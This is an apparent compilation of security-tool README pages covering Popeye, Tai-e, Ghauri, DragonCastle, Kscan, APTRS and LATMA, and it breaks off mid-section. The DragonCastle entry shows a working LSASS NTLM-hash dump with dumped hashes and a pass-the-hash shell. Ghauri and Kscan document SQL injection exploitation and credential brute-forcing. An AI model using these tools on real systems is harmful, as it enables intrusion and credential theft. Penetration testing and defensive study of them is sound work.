Unused, Check minAvailable configuration pdb
๏›€
ClusterRole
Unused cr
๏›€
ClusterRoleBinding
Unused crb
๏›€
Role
Unused ro
๏›€
RoleBinding
Unused rb
๏›€
Ingress
Valid ing
๏›€
NetworkPolicy
Valid np
๏›€
PodSecurityPolicy
Valid psp

You can also see the full list of codes

Save the report

To save the Popeye report to a file pass the --save flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report.

Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

kubeconfig environment. popeye # Popeye uses a spinach config file of course! aka spinachyaml! popeye -f spinach.yml # Popeye a cluster using a kubeconfig context. popeye --context olive # Stuck? popeye help" dir="auto">
# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps report a prometheus scrappable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye โ€žconfiglessโ€œ to make sure you will recognize any new issues that may have arisen in your clustersโ€ฆ

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
code s:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*

# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80

# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if about these threshold.
limits:
cpu: 80
memory: 75

# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources :
- pods
- nodes
verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:

Level Icon Jurassic Color Description
Ok
โœ…
OK Green Happy!
Info
๏”Š
I BlueGreen FYI
Warn
๏˜ฑ
W Yellow Potential Issue
Error
๏’ฅ
E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up whenโ€ฆ

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: ๅคช้˜ฟ; pronunciation: [หˆtaษชษ™:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Support SQL injection for following DBMS.
    • MySQL
    • Microsoft SQL Server
    • Postgre
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Mulitipart Form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernรกndez (@TheXC3LL)

References



Kscan - Simple Asset Mapping Tool


0 Disclaimer (The author did not participate in the XX action, don't trace it)

  • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

  • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.

If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.

Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.

1 Introduction

 _   __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|

Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute force cracking on scan results, and is the first open source RDP brute force cracking tool on the go platform.

2 Foreword

At present, there are actually many tools for asset scanning, fingerprint identification, and vulnerability detection, and there are many great tools, but Kscan actually has many different ideas.

  • Kscan hopes to accept a variety of input formats, and there is no need to classify the scanned objects before use, such as IP, or URL address, etc. This is undoubtedly an unnecessary workload for users, and all entries can be normal Input and identification. If it is a URL address, the path will be reserved for detection. If it is only IP:PORT, the port will be prioritized for protocol identification. Currently Kscan supports three input methods (-t,--target|-f,--fofa|--spy).

  • Kscan does not seek efficiency by comparing port numbers with common protocols to confirm port protocols, nor does it only detect WEB assets. In this regard, Kscan pays more attention to accuracy and comprehensiveness, and only high-accuracy protocol identification , in order to provide good detection conditions for subsequent application layer identification.

  • Kscan does not use a modular approach to do pure function stacking, such as a module obtains the title separately, a module obtains SMB information separately, etc., runs independently, and outputs independently, but outputs asset information in units of ports, such as ports If the protocol is HTTP, subsequent fingerprinting and title acquisition will be performed automatically. If the port protocol is RPC, it will try to obtain the host name, etc.

3 Compilation Manual

Compiler Manual

4 Get started

Kscan currently has 3 ways to input targets

  • -t/--target can add the --check parameter to fingerprint only the specified target port, otherwise the target will be port scanned and fingerprinted
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
  • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segment, otherwise only the surviving network segment will be detected
[Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
[all]: All private network addresses (192.168/172.32/10, etc.) will be probed
IP address: will detect the B segment where the specified IP address is located
  • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results, otherwise only the fofa retrieval results will be returned
fofa search keywords: will directly return fofa search results

5 Instructions

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]


optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check Fingerprinting the target address, only port detection will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified ports๏ผŒsupport๏ผš80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
-Cn With this parameter, the console output will not be colored.
-sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
--hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
hydra options:
--hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
--hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
--hydra-update Customize the user name and password mode. If this parameter is carried, it is a new mode, and the user name and password will be added to the default dictionary. Otherwise the default dictionary will be replaced.
--hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

The function is not complicated, the others are explored by themselves

6 Demo

6.1 Port Scan Mode

6.2 Survival network segment detection

6.3 Fofa result retrieval

6.4 Brute-force cracking

6.5 CDN identification



APTRS - Automated Penetration Testing Reporting System


APTRS (Automated Penetration Testing Reporting System) is an automated reporting tool in Python and Django. The tool allows Penetration testers to create a report directly without using the Traditional Docx file. It also provides an approach to keeping track of the projects and vulnerabilities.


Documentation

Documentation

Prerequisites

Installation

The tool has been tested using Python 3.8.10 on Kali Linux 2022.2/3, Ubuntu 20.04.5 LTS, Windows 10/11.

Windows Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.bat

Linux Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.sh

Running

Windows

  run.bat

Linux

  run.sh

Features

  • Demo Report
  • Managing Vulnerabilities
  • Manage All Projects in one place
  • Create a Vulnerability Database and avoid writing the same description and recommendations again
  • Easily Create PDF Reprot
  • Dynamically add POC, Description and Recommendations
  • Manage Customers and Comapany

Screenshots

Project

View Project

Project Vulnerability

Project Report

Project Add Vulnerability

Roadmap

  • Improving Report Quality
  • Bulk Instance Upload
  • Pentest Mapper Burp Suite Extension Integration
  • Allowing Multiple Project Scope
  • Improving Code, Error handling and Security
  • Docker Support
  • Implementing Rest API
  • Project and Project Retest Handler
  • Access Control and Authorization
  • Support Nessus Parsing

Authors



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.


The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

